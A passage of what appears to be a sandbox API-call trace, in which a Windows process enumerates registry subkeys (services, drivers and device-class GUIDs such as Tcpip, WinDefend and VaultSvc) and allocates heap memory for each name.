Flags=0xc, Size=0xc) returned 0x5260c8 [0085.611] GetProcessHeap () returned 0x510000 [0085.611] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5267e8 [0085.611] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x40, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="sacsvr", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.611] lstrlenW (lpString="sacsvr") returned 6 [0085.611] GetProcessHeap () returned 0x510000 [0085.611] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xe) returned 0x5260e0 [0085.611] GetProcessHeap () returned 0x510000 [0085.611] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526808 [0085.611] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x41, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SCardSvr", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.611] lstrlenW (lpString="SCardSvr") returned 8 [0085.611] GetProcessHeap () returned 0x510000 [0085.611] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x12) returned 0x526828 [0085.611] GetProcessHeap () returned 0x510000 [0085.611] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526848 [0085.612] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x42, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SCSI Class", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.612] lstrlenW (lpString="SCSI Class") returned 10 [0085.612] GetProcessHeap () returned 0x510000 [0085.612] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x16) returned 0x526868 [0085.612] GetProcessHeap () returned 0x510000 [0085.612] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526888 [0085.612] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x43, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="sermouse.sys", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.612] lstrlenW (lpString="sermouse.sys") returned 12 [0085.612] GetProcessHeap () returned 0x510000 [0085.612] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x1a) returned 0x5240e0 [0085.612] GetProcessHeap () returned 0x510000 [0085.612] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5268a8 [0085.612] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x44, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SharedAccess", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.612] lstrlenW (lpString="SharedAccess") returned 12 [0085.612] GetProcessHeap () returned 0x510000 [0085.612] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x1a) returned 0x524108 [0085.612] GetProcessHeap () returned 0x510000 [0085.612] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5268c8 [0085.612] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x45, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Streams Drivers", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.612] lstrlenW (lpString="Streams Drivers") returned 15 [0085.612] GetProcessHeap () returned 0x510000 [0085.612] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x20) returned 0x524130 [0085.612] GetProcessHeap () returned 0x510000 [0085.612] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5268e8 [0085.613] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x46, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SWPRV", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.613] lstrlenW (lpString="SWPRV") returned 5 [0085.613] GetProcessHeap () returned 0x510000 [0085.613] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xc) returned 0x5260f8 [0085.613] GetProcessHeap () returned 0x510000 [0085.613] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526908 [0085.614] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x47, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System Bus Extender", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.614] lstrlenW (lpString="System Bus Extender") returned 19 [0085.614] GetProcessHeap () returned 0x510000 [0085.614] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x28) returned 0x5262d0 [0085.614] GetProcessHeap () returned 0x510000 [0085.614] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526928 [0085.614] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x48, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TabletInputService", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.614] lstrlenW (lpString="TabletInputService") returned 18 [0085.614] GetProcessHeap () returned 0x510000 [0085.614] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x26) returned 0x526300 [0085.614] GetProcessHeap () returned 0x510000 [0085.614] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526948 [0085.614] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x49, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TBS", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.614] lstrlenW (lpString="TBS") returned 3 [0085.614] GetProcessHeap () returned 0x510000 [0085.614] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x8) returned 0x526330 [0085.614] GetProcessHeap () returned 0x510000 [0085.614] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526968 [0085.614] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x4a, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Tcpip", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.614] lstrlenW (lpString="Tcpip") returned 5 [0085.615] GetProcessHeap () returned 0x510000 [0085.615] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xc) returned 0x526110 [0085.615] GetProcessHeap () returned 0x510000 [0085.615] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526988 [0085.615] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x4b, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TDI", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.615] lstrlenW (lpString="TDI") returned 3 [0085.615] GetProcessHeap () returned 0x510000 [0085.615] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x8) returned 0x526340 [0085.615] GetProcessHeap () returned 0x510000 [0085.615] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5269a8 [0085.615] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x4c, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TrustedInstaller", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.615] lstrlenW (lpString="TrustedInstaller") returned 16 [0085.615] GetProcessHeap () returned 0x510000 [0085.615] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x22) returned 0x526350 [0085.615] GetProcessHeap () returned 0x510000 [0085.615] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5269c8 [0085.615] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x4d, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="VaultSvc", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.615] lstrlenW (lpString="VaultSvc") returned 8 [0085.615] GetProcessHeap () returned 0x510000 [0085.615] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x12) returned 0x5269e8 [0085.615] GetProcessHeap () returned 0x510000 [0085.615] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526a08 [0085.615] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x4e, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="VDS", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.615] lstrlenW (lpString="VDS") returned 3 [0085.615] GetProcessHeap () returned 0x510000 [0085.615] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x8) returned 0x526380 [0085.615] GetProcessHeap () returned 0x510000 [0085.615] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526a28 [0085.616] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x4f, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="vga.sys", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.616] lstrlenW (lpString="vga.sys") returned 7 [0085.616] GetProcessHeap () returned 0x510000 [0085.616] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x526128 [0085.616] GetProcessHeap () returned 0x510000 [0085.616] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526a48 [0085.616] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x50, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="vgasave.sys", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.616] lstrlenW (lpString="vgasave.sys") returned 11 [0085.616] GetProcessHeap () returned 0x510000 [0085.616] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x18) returned 0x526a68 [0085.616] GetProcessHeap () returned 0x510000 [0085.616] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526a88 [0085.616] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x51, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="vmms", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.616] lstrlenW (lpString="vmms") returned 4 [0085.616] GetProcessHeap () returned 0x510000 [0085.616] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xa) returned 0x526140 [0085.616] GetProcessHeap () returned 0x510000 [0085.616] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526aa8 [0085.616] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x52, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="volmgr.sys", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.616] lstrlenW (lpString="volmgr.sys") returned 10 [0085.616] GetProcessHeap () returned 0x510000 [0085.616] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x16) returned 0x526ac8 [0085.616] GetProcessHeap () returned 0x510000 [0085.616] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526ae8 [0085.617] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x53, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="volmgrx.sys", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.617] lstrlenW (lpString="volmgrx.sys") returned 11 [0085.617] GetProcessHeap () returned 0x510000 [0085.617] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x18) returned 0x526b08 [0085.617] GetProcessHeap () returned 0x510000 [0085.617] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526b28 [0085.617] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x54, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WinDefend", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.617] lstrlenW (lpString="WinDefend") returned 9 [0085.617] GetProcessHeap () returned 0x510000 [0085.617] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526b48 [0085.617] GetProcessHeap () returned 0x510000 [0085.617] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526b68 [0085.617] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x55, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WinMgmt", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.617] lstrlenW (lpString="WinMgmt") returned 7 [0085.617] GetProcessHeap () returned 0x510000 [0085.617] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x526158 [0085.617] GetProcessHeap () returned 0x510000 [0085.617] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526b88 [0085.617] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x56, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Wlansvc", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.617] lstrlenW (lpString="Wlansvc") returned 7 [0085.617] GetProcessHeap () returned 0x510000 [0085.617] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x526170 [0085.617] GetProcessHeap () returned 0x510000 [0085.617] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526ba8 [0085.617] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x57, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WudfPf", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.618] lstrlenW (lpString="WudfPf") returned 6 [0085.618] GetProcessHeap () returned 0x510000 [0085.618] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xe) returned 0x526188 [0085.618] GetProcessHeap () returned 0x510000 [0085.618] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526bc8 [0085.618] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x58, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WudfRd", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.618] lstrlenW (lpString="WudfRd") returned 6 [0085.618] GetProcessHeap () returned 0x510000 [0085.618] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0xe) returned 0x5261a0 [0085.618] GetProcessHeap () returned 0x510000 [0085.618] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526be8 [0085.618] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x59, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WudfSvc", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.618] lstrlenW (lpString="WudfSvc") returned 7 [0085.618] GetProcessHeap () returned 0x510000 [0085.618] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x10) returned 0x5280b8 [0085.618] GetProcessHeap () returned 0x510000 [0085.618] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526c08 [0085.618] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x5a, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WudfUsbccidDriver", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.618] lstrlenW (lpString="WudfUsbccidDriver") returned 17 [0085.618] GetProcessHeap () returned 0x510000 [0085.618] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x24) returned 0x526390 [0085.619] GetProcessHeap () returned 0x510000 [0085.619] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526c28 [0085.619] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x5b, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{36FC9E60-C465-11CF-8056-444553540000}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.619] lstrlenW (lpString="{36FC9E60-C465-11CF-8056-444553540000}") returned 38 [0085.619] GetProcessHeap () returned 0x510000 [0085.619] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x5270b8 [0085.619] GetProcessHeap () returned 0x510000 [0085.619] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526c48 [0085.619] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x5c, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E965-E325-11CE-BFC1-08002BE10318}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.619] lstrlenW (lpString="{4D36E965-E325-11CE-BFC1-08002BE10318}") returned 38 [0085.619] GetProcessHeap () returned 0x510000 [0085.619] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x527110 [0085.619] GetProcessHeap () returned 0x510000 [0085.619] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526c68 [0085.619] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x5d, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E967-E325-11CE-BFC1-08002BE10318}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.619] lstrlenW (lpString="{4D36E967-E325-11CE-BFC1-08002BE10318}") returned 38 [0085.619] GetProcessHeap () returned 0x510000 [0085.619] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x527168 [0085.619] GetProcessHeap () returned 0x510000 [0085.619] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526c88 [0085.619] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x5e, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E969-E325-11CE-BFC1-08002BE10318}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.619] lstrlenW (lpString="{4D36E969-E325-11CE-BFC1-08002BE10318}") returned 38 [0085.619] GetProcessHeap () returned 0x510000 [0085.619] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x5271c0 [0085.619] GetProcessHeap () returned 0x510000 [0085.620] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526ca8 [0085.620] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x5f, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E96A-E325-11CE-BFC1-08002BE10318}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.620] lstrlenW (lpString="{4D36E96A-E325-11CE-BFC1-08002BE10318}") returned 38 [0085.620] GetProcessHeap () returned 0x510000 [0085.620] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x527218 [0085.620] GetProcessHeap () returned 0x510000 [0085.620] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526cc8 [0085.620] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x60, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E96B-E325-11CE-BFC1-08002BE10318}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.620] lstrlenW (lpString="{4D36E96B-E325-11CE-BFC1-08002BE10318}") returned 38 [0085.620] GetProcessHeap () returned 0x510000 [0085.620] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x527270 [0085.620] GetProcessHeap () returned 0x510000 [0085.620] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526ce8 [0085.620] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x61, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E96F-E325-11CE-BFC1-08002BE10318}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.620] lstrlenW (lpString="{4D36E96F-E325-11CE-BFC1-08002BE10318}") returned 38 [0085.620] GetProcessHeap () returned 0x510000 [0085.620] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x5272c8 [0085.620] GetProcessHeap () returned 0x510000 [0085.620] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x526d08 [0085.620] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x62, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E972-E325-11CE-BFC1-08002BE10318}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.620] lstrlenW (lpString="{4D36E972-E325-11CE-BFC1-08002BE10318}") returned 38 [0085.620] GetProcessHeap () returned 0x510000 [0085.620] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x527320 [0085.620] GetProcessHeap () returned 0x510000 [0085.621] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5284b8 [0085.621] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x63, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E973-E325-11CE-BFC1-08002BE10318}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.621] lstrlenW (lpString="{4D36E973-E325-11CE-BFC1-08002BE10318}") returned 38 [0085.621] GetProcessHeap () returned 0x510000 [0085.621] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x527378 [0085.621] GetProcessHeap () returned 0x510000 [0085.621] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5284d8 [0085.621] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x64, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E974-E325-11CE-BFC1-08002BE10318}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.621] lstrlenW (lpString="{4D36E974-E325-11CE-BFC1-08002BE10318}") returned 38 [0085.621] GetProcessHeap () returned 0x510000 [0085.621] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x5273d0 [0085.621] GetProcessHeap () returned 0x510000 [0085.621] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x5284f8 [0085.621] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x65, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E975-E325-11CE-BFC1-08002BE10318}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.621] lstrlenW (lpString="{4D36E975-E325-11CE-BFC1-08002BE10318}") returned 38 [0085.621] GetProcessHeap () returned 0x510000 [0085.621] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x527428 [0085.621] GetProcessHeap () returned 0x510000 [0085.621] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x528518 [0085.621] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x66, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E977-E325-11CE-BFC1-08002BE10318}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.621] lstrlenW (lpString="{4D36E977-E325-11CE-BFC1-08002BE10318}") returned 38 [0085.621] GetProcessHeap () returned 0x510000 [0085.621] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x527480 [0085.621] GetProcessHeap () returned 0x510000 [0085.622] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x528538 [0085.622] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x67, lpName=0x5261c8, lpcchName=0x30f9a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4D36E97B-E325-11CE-BFC1-08002BE10318}", lpcchName=0x30f9a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0085.622] lstrlenW (lpString="{4D36E97B-E325-11CE-BFC1-08002BE10318}") returned 38 [0085.622] GetProcessHeap () returned 0x510000 [0085.622] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x4e) returned 0x5274d8 [0085.622] GetProcessHeap () returned 0x510000 [0085.622] RtlAllocateHeap (HeapHandle=0x510000, Flags=0xc, Size=0x14) returned 0x528558 [0085.622] RegEnumKeyExW (in: hKey=0x78, dwIndex=0x68, 